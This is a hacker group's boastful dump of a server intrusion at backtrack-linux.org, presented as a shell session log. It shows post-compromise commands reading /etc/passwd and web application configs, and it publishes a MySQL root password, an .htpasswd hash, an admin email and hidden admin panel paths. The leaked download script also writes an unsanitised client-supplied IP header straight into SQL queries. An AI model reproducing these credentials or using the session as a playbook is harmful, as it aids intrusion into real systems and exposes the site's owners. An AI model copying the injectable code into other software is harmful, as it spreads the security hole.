Attack on backtrack-linux.org From 1337 Team (inj3ct0r.com) . .--. .--. .---. . .'| ) ) / | | --: --: / .-.| .-. . .

| ) ) / ( |( ) | | '---' `--' `--' ' `-'`-`-'`-`--| ; `-'

Since we already tapped into exploit-db and their server lies in the same subnet with backtrack, we decided to check out their mad security. Backtrack is run by muts, the same guy who also administers exploit-db, so no wonder why it was super easy to get a shell... $ uname -a Linux backtrack-linux.org 2.6.32.26-175.fc12.x86_64 #1 SMP Wed Dec 1 21:39:34 UT C 2010 x86_64 x86_64 x86_64 GNU/Linux $ id uid=48(apache) gid=494(apache) groups=494(apache) context=unconfined_u:system_r: httpd_t:s0 $ alias ls="ls -la" $ ls total 110 dr-xr-xr-x. dr-xr-xr-x. -rw-r--r--. drwx------. dr-xr-xr-x. dr-xr-xr-x. drwxr-xr-x. drwxr-xr-x. drwxr-xr-x. dr-xr-xr-x. dr-xr-xr-x. drwx------. drwxr-xr-x. drwxr-xr-x. drwxr-xr-x. drwxr-xr-x. dr-xr-xr-x. drwxr-xr-x. dr-xr-x---. dr-xr-xr-x. drwxr-xr-x. drwxr-xr-x. drwxr-xr-x. drwxrwxrwt. drwxr-xr-x. drwxr-xr-x.

25 25 1 2 2 5 17 66 3 9 9 2 2 2 2 2 160 5 4 2 7 2 13 4 14 20

root root root root root root root root root root root root root root root root root root root root root root root root root root

root root root root root root root root root root root root root root root root root root root root root root root root root root

4096 4096 0 4096 4096 1024 3580 4096 4096 4096 12288 16384 4096 4096 4096 4096 0 4096 4096 12288 0 4096 0 4096 4096 4096

Dec Dec Dec Dec Nov Dec Dec Dec Aug Aug Nov Aug Aug Aug Aug Aug Dec Dec Dec Nov Dec Aug Dec Dec Aug Aug

7 7 7 10 29 7 7 7 14 11 29 11 11 25 25 25 7 3 10 29 7 25 7 10 11 14

08:42 08:42 08:42 03:40 19:59 08:41 08:43 08:42 20:50 04:01 20:00 02:01 04:42 2009 2009 2009 08:42 17:16 08:50 19:59 08:42 2009 08:42 14:08 02:03 20:45

. .. .autofsck backup bin boot dev etc home lib lib64 lost+found maint media mnt opt proc recovery root sbin selinux srv sys tmp usr var

$ cat /etc/issue Fedora release 12 (Constantine)

Kernel \r on an \m (\l) $ cat /etc/passwd root:x:0:0:root:/root:/bin/bash bin:x:1:1:bin:/bin:/sbin/nologin daemon:x:2:2:daemon:/sbin:/sbin/nologin adm:x:3:4:adm:/var/adm:/sbin/nologin lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin sync:x:5:0:sync:/sbin:/bin/sync shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown halt:x:7:0:halt:/sbin:/sbin/halt mail:x:8:12:mail:/var/spool/mail:/sbin/nologin uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin operator:x:11:0:operator:/root:/sbin/nologin games:x:12:100:games:/usr/games:/sbin/nologin gopher:x:13:30:gopher:/var/gopher:/sbin/nologin ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin nobody:x:99:99:Nobody:/:/sbin/nologin vcsa:x:69:499:virtual console memory owner:/dev:/sbin/nologin dbus:x:81:81:System message bus:/:/sbin/nologin mailnull:x:47:497::/var/spool/mqueue:/sbin/nologin smmsp:x:51:496::/var/spool/mqueue:/sbin/nologin sshd:x:74:495:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin apache:x:48:494:Apache:/var/www:/sbin/nologin mysql:x:27:493:MySQL Server:/var/lib/mysql:/bin/bash ossec:x:500:500::/var/ossec:/sbin/nologin ossecm:x:501:500::/var/ossec:/sbin/nologin ossecr:x:502:500::/var/ossec:/sbin/nologin ntp:x:38:38::/etc/ntp:/sbin/nologin tcpdump:x:72:72::/:/sbin/nologin $ cd /var/www/html/ $ ls total 90224 drwxr-xr-x. drwxr-xr-x. -rw-r--r--. -rw-r--r--. -rw-r--r--. -rw-r--r--. drwxr-xr-x. -rw-r--r--. -rw-r--r--. -rw-r--r--. -rw-r--r--. -rw-r--r--. -rw-r--r--. -rw-r--r--. -rw-r--r--. -rw-r--r--. -rwxr-xr-x. -rw-r--r--. -rw-r--r--. drwxr-xr-x. -rw-r--r--. -rw-r--r--. -rw-r--r--. -rw-r--r--.

13 6 1 1 1 1 2 1 1 1 1 1 1 1 1 1 1 1 1 2 1 1 1 1

apache root apache apache apache apache apache apache apache apache apache apache apache root apache apache apache apache apache apache apache apache apache apache

apache 4096 Dec 9 12:21 . root 4096 Aug 18 10:30 .. apache 4183 Dec 5 16:50 .htaccess apache 1156 Aug 11 03:17 HT apache 2233 Aug 11 03:17 HT-ORIG apache 1526525 Nov 11 14:01 IMG_0585.JPG apache 4096 Aug 11 03:16 ads apache 125832 Nov 19 12:18 bootsplash.jpg apache 754444 Aug 11 03:16 bt-nsa.png apache 757498 Aug 11 03:16 bt-nsa2.png apache 81597 Aug 11 03:16 bt4-final-vm.zip.torrent apache 60094 Aug 11 03:16 bt4-final.iso.torrent apache 44 Aug 11 03:16 bt4r1.txt root 686248 Nov 23 10:47 bt4r2.png apache 160728 Aug 11 03:16 btfail.png apache 476 Aug 11 03:16 collapsible_ad.html apache 13397784 Aug 11 03:16 d.bin apache 121 Aug 11 03:16 d.lic apache 12844822 Aug 11 03:16 d32.bin apache 4096 Aug 11 03:16 documents apache 3342 Aug 11 03:16 down.php apache 4158 Aug 11 03:16 download-orig.php apache 4945 Nov 22 11:38 download.php apache 15125 Aug 11 03:16 error.php

-rw-r--r--. -rw-r--r--. drwxr-xr-x. -rw-r--r--. -rw-r--r--. -rw-r--r--. -rw-r--r--. -rw-r--r--. -rw-r--r--. -rw-r--r--. -rw-r--r--. drwxr-xr-x. -rw-r--r--. -rw-r--r--. -rw-r--r--. -rw-r--r--. -rw-r--r--. -rw-r--r--. -rw-r--r--. -rw-r--r--. -rw-r--r--. -rw-r--r--. drwxr-xr-x. -rw-r--r--. -rw-r--r--. -rw-r--r--. -rw-r--r--. -rw-r--r--. -rw-r--r--. -rw-r--r--. -rw-r--r--. -rw-r--r--. drwxr-xr-x. -rw-r--r--. -rw-r--r--. -rw-r--r--. -rw-r--r--. -rw-r--r--. drwxr-xr-x. drwxr-xr-x. -rw-r--r--. drwxr-xr-x. -rw-r--r--. -rw-r--r--. -rw-r--r--. -rw-r--r--. -rw-r--r--. -rw-r--r--. -rw-r--r--. drwxr-xr-x. -rw-r--r--. -rw-r--r--. drwxr-xr-x. -rw-r--r--. -rw-r--r--. -rw-r--r--. -rw-r--r--. -rw-r--r--. -rw-r--r--. -rw-r--r--.

1 1 21 1 1 1 1 1 1 1 1 8 1 1 1 1 1 1 1 1 1 1 2 1 1 1 1 1 1 1 1 1 3 1 1 1 1 1 2 15 1 8 1 1 1 1 1 1 1 9 1 1 8 1 1 1 1 1 1 1

apache apache apache apache apache apache apache apache apache apache apache apache apache apache apache apache apache apache apache apache apache apache apache apache apache apache apache apache apache apache apache apache apache apache apache apache apache apache apache apache apache apache apache apache apache apache apache apache apache apache apache apache apache apache apache apache apache apache apache apache

apache apache apache apache apache apache apache apache apache apache apache apache apache apache apache apache apache apache apache apache apache apache apache apache apache apache apache apache apache apache apache apache apache apache apache apache apache apache apache apache apache apache apache apache apache apache apache apache apache apache apache apache apache apache apache apache apache apache apache apache

137383 1150 4096 87176 53 23 1978856 2264271 2197361 315306 169202 4096 3 397 321196 147841 15410 48404480 13946 1382400 1508471 1636957 4096 582 9120 712 63 801 31 601 38971 2485 4096 714372 1536 33 23660 5 4096 4096 4391 4096 40284 220 274 3926 238 3173 2696 4096 1255 240 4096 2002 2441 26059 7774 487 218 316

Aug Aug Nov Aug Aug Aug Sep Sep Sep Aug Aug Nov Aug Dec Nov Sep Dec Nov Aug Oct Aug Aug Nov Nov Dec Nov Aug Aug Aug Nov Dec Dec Aug Aug Aug Dec Aug Aug Nov Nov Dec Dec Dec Dec Dec Dec Dec Dec Nov Dec Dec Dec Aug Dec Dec Dec Dec Dec Dec Dec

11 11 22 11 11 11 17 17 17 11 11 21 11 9 19 4 9 14 11 26 11 11 22 22 9 10 11 11 11 10 7 7 11 11 11 10 11 11 22 27 9 5 9 9 9 9 9 9 22 9 9 9 13 9 9 9 9 9 9 9

03:16 03:16 18:56 03:17 03:17 03:17 08:06 08:12 08:15 03:17 03:17 16:38 03:17 12:20 15:06 12:37 12:20 15:53 03:17 10:38 03:17 03:17 11:46 11:21 12:20 22:27 03:17 03:17 03:17 22:28 23:23 23:23 03:17 03:17 03:17 03:34 03:17 03:17 09:22 16:52 12:20 08:12 12:20 12:20 12:20 12:20 12:20 12:20 19:32 12:21 12:20 12:20 20:06 12:20 12:20 12:20 12:20 12:20 12:20 12:20

example-2.jpg favicon.ico forums google.png googled6c4817aa45e0032.html googlehostedservice.html hola.jpg hola1.jpg hola2.jpg hola22.png hola23.png images index.html index.php kanji.png knock-0.5.tar.gz license.txt mediawiki-1.16.0.tar nv-xorg.conf oiopub-direct.tar p2270016.jpg p2280018.jpg patches r2.php readme.html s.php show.dud.php show.original.php show.php show.stats.working.php sitemap.xml sitemap.xml.gz slider spot-the-release.png stats.php stats.txt style.css test.php torrents wiki wp-activate.php wp-admin wp-app.php wp-atom.php wp-blog-header.php wp-comments-post.php wp-commentsrss2.php wp-config-sample.php wp-config.php wp-content wp-cron.php wp-feed.php wp-includes wp-links-opml.php wp-load.php wp-login.php wp-mail.php wp-pass.php wp-rdf.php wp-register.php

-rw-r--r--. -rw-r--r--. -rw-r--r--. -rw-r--r--. -rw-r--r--. -rw-r--r--. -rw-r--r--. -rw-r--r--.

1 1 1 1 1 1 1 1

apache apache apache apache apache root apache apache

apache apache apache apache apache root apache apache

218 220 9177 18695 3702 99665 85 95481

Dec Dec Dec Dec Dec Nov Nov Dec

9 9 9 9 9 24 20 9

12:20 12:20 12:20 12:20 12:20 00:52 13:43 12:20

wp-rss.php wp-rss2.php wp-settings.php wp-signup.php wp-trackback.php wtfff.png x.gif xmlrpc.php

$ cat wp-config.php <?php /** Enable W3 Total Cache **/ define('WP_CACHE', true); // Added by W3 Total Cache /** * The base configurations of the WordPress. * * This file has the following configurations: MySQL settings, Table Prefix, * Secret Keys, WordPress Language, and ABSPATH. You can find more information b y * visiting {@link http://codex.wordpress.org/Editing_wp-config.php Editing * wp-config.php} Codex page. You can get the MySQL settings from your web host. * * This file is used by the wp-config.php creation script during the * installation. You don't have to use the web site, you can just copy this file * to "wp-config.php" and fill in the values. * * @package WordPress */ // ** MySQL settings - You can get this info from your web host ** // /** The name of the database for WordPress */ define('DB_NAME', 'blog'); /** MySQL database username */ define('DB_USER', 'root'); /** MySQL database password */ define('DB_PASSWORD', '234hi2u3d98as7d23kuh'); /** MySQL hostname */ define('DB_HOST', 'localhost'); /** Database Charset to use in creating database tables. */ define('DB_CHARSET', 'utf8'); /** The Database Collate type. Don't change this if in doubt. */ define('DB_COLLATE', ''); /**#@+ * Authentication Unique Keys. * * Change these to different unique phrases! * You can generate these using the {@link https://api.wordpress.org/secret-key/ 1.1/ WordPress.org secret-key service} * You can change these at any point in time to invalidate all existing cookies. This will force all users to have to log in again. * * @since 2.6.0 */

define('AUTH_KEY', 'put your unique phrase here'); define('SECURE_AUTH_KEY', 'put your unique phrase here'); define('LOGGED_IN_KEY', 'put your unique phrase here'); define('NONCE_KEY', 'put your unique phrase here'); /**#@-*/ /** * WordPress Database Table prefix. * * You can have multiple installations in one database if you give each a unique * prefix. Only numbers, letters, and underscores please! */ $table_prefix = 'wp_'; /** * WordPress Localized Language, defaults to English. * * Change this to localize WordPress. A corresponding MO file for the chosen * language must be installed to wp-content/languages. For example, install * de.mo to wp-content/languages and set WPLANG to 'de' to enable German * language support. */ define ('WPLANG', ''); /* That's all, stop editing! Happy blogging. */ /** WordPress absolute path to the Wordpress directory. */ if ( !defined('ABSPATH') ) define('ABSPATH', dirname(__FILE__) . '/'); /** Sets up WordPress vars and included files. */ require_once(ABSPATH . 'wp-settings.php'); $ cat show.php <?php include 'stats.txt'; ?> $ cat stats.txt BackTrack 4 - 4916323 downloads cat download.php <?php // DO NOT CHANGE THIS FILE WITHOUT TALKING TO MUTS FIRST> EVEN IF YOU THINK YOU KNOW WHAT YOU ARE DOING!!! function getRealIpAddr() { if (!empty($_SERVER['HTTP_CLIENT_IP'])) //check ip from share internet { $ip=$_SERVER['HTTP_CLIENT_IP']; } elseif (!empty($_SERVER['HTTP_X_FORWARDED_FOR'])) //to check ip is pass fr om proxy { $ip=$_SERVER['HTTP_X_FORWARDED_FOR']; } else { $ip=$_SERVER['REMOTE_ADDR'];

} return $ip; } $ip=getRealIpAddr(); $username="root"; $password="234hi2u3d98as7d23kuh"; $database="counter"; function choose($iso) { $num = Rand (1,5); switch ($num) { case 1: $link="ftp://ftp.uio.no/pub/security/backtrack/$iso"; break; case 2: $link="http://ftp.uio.no/pub/security/backtrack/$iso"; break; case 3: $link="http://ftp.halifax.rwth-aachen.de/backtrack/$iso"; break; case 4: $link="http://ftp.halifax.rwth-aachen.de/backtrack/$iso"; break; case 5: $link="http://ftp.halifax.rwth-aachen.de/backtrack/$iso"; break; // case 6: // $link="http://moon.backtrack-linux.org/downloads/$iso"; // break; } return $link; } $version=$_GET["fname"]; if (! (($version=="bt4f") or ($version=="bt4fvm") or ($version=="bt4r1") or ($ve rsion=="bt4r1vm") or ($version=="bt3") or ($version=="bt4pf") or ($version=="bt4 b") or ($version=="bt4bvm") or ($version=="bt4r2") or ($version=="bt4r2vm"))) { echo "This page cannot be accessed directly."; exit; }

if ($version=="bt4r2") { $iso="bt4-r2.iso"; $link=choose($iso); mysql_connect("localhost",$username,$password); @mysql_select_db($database) or die( "Unable to select database"); $query = "INSERT INTO downloadss VALUES ('',\"$ip\",\"$version\")"; mysql_query($query); mysql_close(); header( "Location: $link "); exit; } if ($version=="bt4r2vm") { $iso="bt4-r2-vm.tar.bz2"; $link=choose($iso); mysql_connect("localhost",$username,$password); @mysql_select_db($database) or die( "Unable to select database"); $query = "INSERT INTO downloadss VALUES ('',\"$ip\",\"$version\")"; mysql_query($query); mysql_close(); header( "Location: $link "); exit; }

if ($version=="bt4f") { $iso="bt4-final.iso"; $link=choose($iso); mysql_connect("localhost",$username,$password); @mysql_select_db($database) or die( "Unable to select database"); $query = "INSERT INTO downloadss VALUES ('',\"$ip\",\"$version\")"; mysql_query($query); mysql_close(); header( "Location: $link "); exit; } elseif ($version=="bt4fvm") { $iso="bt4-final-vm.zip"; $link=choose($iso); mysql_connect("localhost",$username,$password); @mysql_select_db($database) or die( "Unable to select database"); $query = "INSERT INTO downloadss VALUES ('',\"$ip\",\"$version\")"; mysql_query($query);

mysql_close(); header( "Location: $link "); exit; } elseif ($version=="bt4r1") { $iso="bt4-r1.iso"; $link=choose($iso); mysql_connect("localhost",$username,$password); @mysql_select_db($database) or die( "Unable to select database"); $query = "INSERT INTO downloadss VALUES ('',\"$ip\",\"$version\")"; mysql_query($query); mysql_close(); header( "Location: $link "); exit; } elseif ($version=="bt4r1vm") { $iso="bt4-r1-vm.tar.bz2"; $link=choose($iso); mysql_connect("localhost",$username,$password); @mysql_select_db($database) or die( "Unable to select database"); $query = "INSERT INTO downloadss VALUES ('',\"$ip\",\"$version\")"; mysql_query($query); mysql_close(); header( "Location: $link "); exit; } elseif ($version=="bt4pf") { $iso="bt4-pre-final.iso"; $link=choose($iso); mysql_connect("localhost",$username,$password); @mysql_select_db($database) or die( "Unable to select database"); $query = "INSERT INTO downloadss VALUES ('',\"$ip\",\"$version\")"; mysql_query($query); mysql_close(); header( "Location: $link "); exit; } elseif ($version=="bt4b") { $iso="bt4-beta.iso"; $link=choose($iso); mysql_connect("localhost",$username,$password); @mysql_select_db($database) or die( "Unable to select database"); $query = "INSERT INTO downloadss VALUES ('',\"$ip\",\"$version\")"; mysql_query($query); mysql_close();

header( "Location: $link "); exit; } elseif ($version=="bt4bvm") { $iso="bt4-beta-vm-6.5.1.rar"; $link=choose($iso); mysql_connect("localhost",$username,$password); @mysql_select_db($database) or die( "Unable to select database"); $query = "INSERT INTO downloadss VALUES ('',\"$ip\",\"$version\")"; mysql_query($query); mysql_close(); header( "Location: $link "); exit; } elseif ($version=="bt3") { $iso="bt3-final.iso"; $link=choose($iso); mysql_connect("localhost",$username,$password); @mysql_select_db($database) or die( "Unable to select database"); $query = "INSERT INTO downloadss VALUES ('',\"$ip\",\"$version\")"; mysql_query($query); mysql_close(); header( "Location: $link "); exit; } else { exit; } ?> $ cat s.php <?php $username="root"; $password="234hi2u3d98as7d23kuh"; $database="counter";

mysql_connect("localhost",$username,$password); @mysql_select_db($database) or die( "Unable to select database"); $query = "select count(DISTINCT ip) as numrows from downloadz where version=\"bt 4f\""; $query2 = "select count(DISTINCT ip) as numrows from downloadz where version=\"b t4fvm\""; $result=mysql_query($query); $result2=mysql_query($query2); $row2 = mysql_fetch_array($result2, MYSQL_ASSOC); $row = mysql_fetch_array($result, MYSQL_ASSOC); $numrows1 = $row['numrows']; $numrows2 = $row2['numrows'];

mysql_close(); $total= round(($numrows1 + $numrows2) * 1.4); echo "BackTrack 4 Final - $total unique downloads"; ?> $ cd wiki $ ls total 700 drwxr-xr-x. drwxr-xr-x. -rw-r--r--. -rw-r--r--. -rw-r--r--. -rw-r--r--. -rw-r--r--. -rw-r--r--. -rw-r--r--. -rw-r--r--. -rw-r--r--. -rw-r--r--. -rw-r--r--. -rw-r--r--. drwxr-xr-x. -rw-r--r--. -rw-r--r--. drwxr-xr-x. -rw-r--r--. drwxr-xr-x. drwxr-xr-x. drwxr-xr-x. drwxr-xr-x. drwxr-xr-x. -rw-r--r--. -rw-r--r--. drwxr-xr-x. -rw-r--r--. -rw-r--r--. drwxr-xr-x. drwxr-xr-x. drwxr-xr-x. -rw-r--r--. -rw-r--r--. -rw-r--r--. -rw-r--r--. -rw-r--r--. -rw-r--r--. -rw-r--r--. drwxr-xr-x. -rwxrwxrwx. drwxr-xr-x. -rw-r--r--. -rw-r--r--. -rw-r--r--. -rw-r--r--. -rw-r--r--. 15 13 1 1 1 1 1 1 1 1 1 1 1 1 2 1 1 2 1 2 2 4 4 12 1 1 16 1 1 4 13 2 1 1 1 1 1 1 1 2 1 9 1 1 1 1 1 apache apache apache apache apache apache apache apache apache apache apache apache apache apache root apache apache apache apache apache apache apache apache apache apache apache apache apache apache apache apache apache apache apache apache apache apache apache apache apache root apache apache apache apache apache apache apache apache apache apache apache apache apache apache apache apache apache apache apache apache root apache apache apache apache apache apache apache apache apache apache apache apache apache apache apache apache apache apache apache apache apache apache apache apache apache root apache apache apache apache apache apache 4096 4096 23 17997 2073 76 392287 96 4138 5469 3649 58431 648 13307 4096 4707 25 4096 8436 4096 4096 4096 4096 4096 4031 31 4096 4329 28 4096 12288 4096 3054 39 174 8821 383 31 89 4096 6816 4096 4905 29 1347 32 86 Nov Dec Nov Apr Jul Jul Mar Nov Apr Nov Nov Jul May Mar Nov Feb Feb Jul Nov Jul Nov Jul Nov Nov Oct Feb Jul Jan Feb Jul Nov Jul Mar Mar Feb Jul Mar Feb Feb Jul Nov Nov Mar Feb Nov Mar Feb 27 9 14 5 27 27 12 14 18 28 11 28 7 25 27 15 3 28 21 28 14 28 28 23 14 3 28 1 3 28 22 28 21 3 3 27 21 3 3 28 23 28 8 3 5 16 3 16:52 12:21 16:01 2006 07:29 2009 2010 16:01 2008 16:45 2008 03:11 2009 2010 16:53 2010 2008 03:16 14:24 03:16 15:58 03:16 16:44 12:36 2009 2008 03:16 2010 2008 03:16 12:55 03:16 2009 2008 2010 03:40 2009 2008 2010 03:16 18:29 14:12 2010 2008 2008 2009 2010 . .. .htpasswd COPYING CREDITS FAQ HISTORY HT INSTALL LocalSettings.php README RELEASE-NOTES StartProfiler.sample UPGRADE adsense api.php api.php5 bin bt-wiki.png cache config docs extensions images img_auth.php img_auth.php5 includes index.php index.php5 languages maintenance math opensearch_desc.php opensearch_desc.php5 php5.php5 profileinfo.php redirect.php redirect.php5 redirect.phtml serialized sitemap.xml skins thumb.php thumb.php5 trackback.php trackback.php5 wiki.phtml

$ cat .htpasswd edbadmin:YE8mle4nG1Z.c cd .. cat forums/includes/config.php <?php /*======================================================================*\ || #################################################################### || || # vBulletin 4.0.0 Patch Level 1 || # ---------------------------------------------------------------- # || || # All PHP code in this file is 2000-2010 vBulletin Solutions Inc. # || || # This file may not be redistributed in whole or significant part. # || || # ---------------- VBULLETIN IS NOT FREE SOFTWARE ---------------- # || || # http://www.vbulletin.com | http://www.vbulletin.com/license.html # || || #################################################################### || \*======================================================================*/ /*-------------------------------------------------------*\ | ****** NOTE REGARDING THE VARIABLES IN THIS FILE ****** | +---------------------------------------------------------+ | If you get any errors while attempting to connect to | | MySQL, you will need to email your webhost because we | | cannot tell you the correct values for the variables | | in this file. | \*-------------------------------------------------------*/ // ****** DATABASE TYPE ****** // This is the type of the database server on which your vBulletin database wil l be located. // Valid options are mysql and mysqli, for slave support add _slave. Try to us e mysqli if you are using PHP 5 and MySQL 4.1+ // for slave options just append _slave to your preferred database type. $config['Database']['dbtype'] = 'mysql'; // ****** DATABASE NAME ****** // This is the name of the database where your vBulletin will be located. // This must be created by your webhost. $config['Database']['dbname'] = 'forums'; // ****** TABLE PREFIX ****** // Prefix that your vBulletin tables have in the database. $config['Database']['tableprefix'] = ''; // ****** TECHNICAL EMAIL ADDRESS ****** // If any database errors occur, they will be emailed to the address specified here. // Leave this blank to not send any emails when there is a database error. $config['Database']['technicalemail'] = 'muts@offsec.com'; // ****** FORCE EMPTY SQL MODE ****** // New versions of MySQL (4.1+) have introduced some behaviors that are // incompatible with vBulletin. Setting this value to "true" disables those // behaviors. You only need to modify this value if vBulletin recommends it. $config['Database']['force_sql_mode'] = false;

// ****** MASTER DATABASE SERVER NAME AND PORT ****** // This is the hostname or IP address and port of the database server.

// If you are unsure of what to put here, leave the default values. $config['MasterServer']['servername'] = 'localhost'; $config['MasterServer']['port'] = 3306; // ****** MASTER DATABASE USERNAME & PASSWORD ****** // This is the username and password you use to access MySQL. // These must be obtained through your webhost. $config['MasterServer']['username'] = 'root'; $config['MasterServer']['password'] = '234hi2u3d98as7d23kuh'; // ****** MASTER DATABASE PERSISTENT CONNECTIONS ****** // This option allows you to turn persistent connections to MySQL on or off. // The difference in performance is negligible for all but the largest boards. // If you are unsure what this should be, leave it off. (0 = off; 1 = on) $config['MasterServer']['usepconnect'] = 0;

// ****** SLAVE DATABASE CONFIGURATION ****** // If you have multiple database backends, this is the information for your sla ve // server. If you are not 100% sure you need to fill in this information, // do not change any of the values here. $config['SlaveServer']['servername'] = ''; $config['SlaveServer']['port'] = 3306; $config['SlaveServer']['username'] = ''; $config['SlaveServer']['password'] = ''; $config['SlaveServer']['usepconnect'] = 0;

// ****** PATH TO ADMIN & MODERATOR CONTROL PANELS ****** // This setting allows you to change the name of the folders that the admin and // moderator control panels reside in. You may wish to do this for security pur poses. // Please note that if you change the name of the directory here, you will stil l need // to manually change the name of the directory on the server. $config['Misc']['admincpdir'] = 'admincphaha'; $config['Misc']['modcpdir'] = 'modcphaha'; // Prefix that all vBulletin cookies will have // Keep this short and only use numbers and letters, i.e. 1-9 and a-Z $config['Misc']['cookieprefix'] = 'bb'; // ******** FULL PATH TO FORUMS DIRECTORY ****** // On a few systems it may be necessary to input the full path to your forums d irectory // for vBulletin to function normally. You can ignore this setting unless vBull etin // tells you to fill this in. Do not include a trailing slash! // Example Unix: // $config['Misc']['forumpath'] = '/home/users/public_html/forums'; // Example Win32: // $config['Misc']['forumpath'] = 'c:\program files\apache group\apache\htdoc s\vb3'; $config['Misc']['forumpath'] = '';

// ****** USERS WITH ADMIN LOG VIEWING PERMISSIONS ****** // The users specified here will be allowed to view the admin log in the contro l panel. // Users must be specified by *ID number* here. To obtain a user's ID number, // view their profile via the control panel. If this is a new installation, lea ve // the first user created will have a user ID of 1. Seperate each userid with a comma. $config['SpecialUsers']['canviewadminlog'] = '1'; // ****** USERS WITH ADMIN LOG PRUNING PERMISSIONS ****** // The users specified here will be allowed to remove ("prune") entries from th e admin // log. See the above entry for more information on the format. $config['SpecialUsers']['canpruneadminlog'] = '1'; // ****** USERS WITH QUERY RUNNING PERMISSIONS ****** // The users specified here will be allowed to run queries from the control pan el. // See the above entries for more information on the format. // Please note that the ability to run queries is quite powerful. You may wish // to remove all user IDs from this list for security reasons. $config['SpecialUsers']['canrunqueries'] = ''; // ****** UNDELETABLE / UNALTERABLE USERS ****** // The users specified here will not be deletable or alterable from the control panel by any users. // To specify more than one user, separate userids with commas. $config['SpecialUsers']['undeletableusers'] = ''; // ****** SUPER ADMINISTRATORS ****** // The users specified below will have permission to access the administrator p ermissions // page, which controls the permissions of other administrators $config['SpecialUsers']['superadministrators'] = '1,2'; // ****** DATASTORE CACHE CONFIGURATION ***** // Here you can configure different methods for caching datastore items. // vB_Datastore_Filecache - to use includes/datastore/datastore_cache.php // vB_Datastore_APC - to use APC // vB_Datastore_XCache - to use XCache // vB_Datastore_Memcached - to use a Memcache server, more configuration below // $config['Datastore']['class'] = 'vB_Datastore_Filecache'; // ******** DATASTORE PREFIX ****** // If you are using a PHP Caching system (APC, XCache, eAccelerator) with more // than one set of forums installed on your host, you *may* need to use a prefi x // so that they do not try to use the same variable within the cache. // This works in a similar manner to the database table prefix. // $config['Datastore']['prefix'] = ''; // It is also necessary to specify the hostname or IP address and the port the server is listening on /* $config['Datastore']['class'] = 'vB_Datastore_Memcached'; $i = 0; // First Server $i++; $config['Misc']['memcacheserver'][$i] = '127.0.0.1';

$config['Misc']['memcacheport'][$i] = 11211; $config['Misc']['memcachepersistent'][$i] = true; $config['Misc']['memcacheweight'][$i] = 1; $config['Misc']['memcachetimeout'][$i] = 1; $config['Misc']['memcacheretry_interval'][$i] = 15; */ // ****** The following options are only needed in special cases ****** // ****** MySQLI OPTIONS ***** // When using MySQL 4.1+, MySQLi should be used to connect to the database. // If you need to set the default connection charset because your database // is using a charset other than latin1, you can set the charset here. // If you don't set the charset to be the same as your database, you // may receive collation errors. Ignore this setting unless you // are sure you need to use it. // $config['Mysqli']['charset'] = 'utf8'; // Optionally, PHP can be instructed to set connection parameters by reading fr om the // file named in 'ini_file'. Please use a full path to the file. // Example: // $config['Mysqli']['ini_file'] = 'c:\program files\MySQL\MySQL Server 4.1\my. ini'; $config['Mysqli']['ini_file'] = ''; // Image Processing Options // Images that exceed either dimension below will not be resized by vBulletin. If you need to resize larger images, alter these settings. $config['Misc']['maxwidth'] = 2592; $config['Misc']['maxheight'] = 1944; /*======================================================================*\ || #################################################################### || # Downloaded: 22:25, Sat Jan 9th 2010 || # CVS: $RCSfile$ - $Revision: 32878 $ || #################################################################### \*======================================================================*/ happY 1337day ;)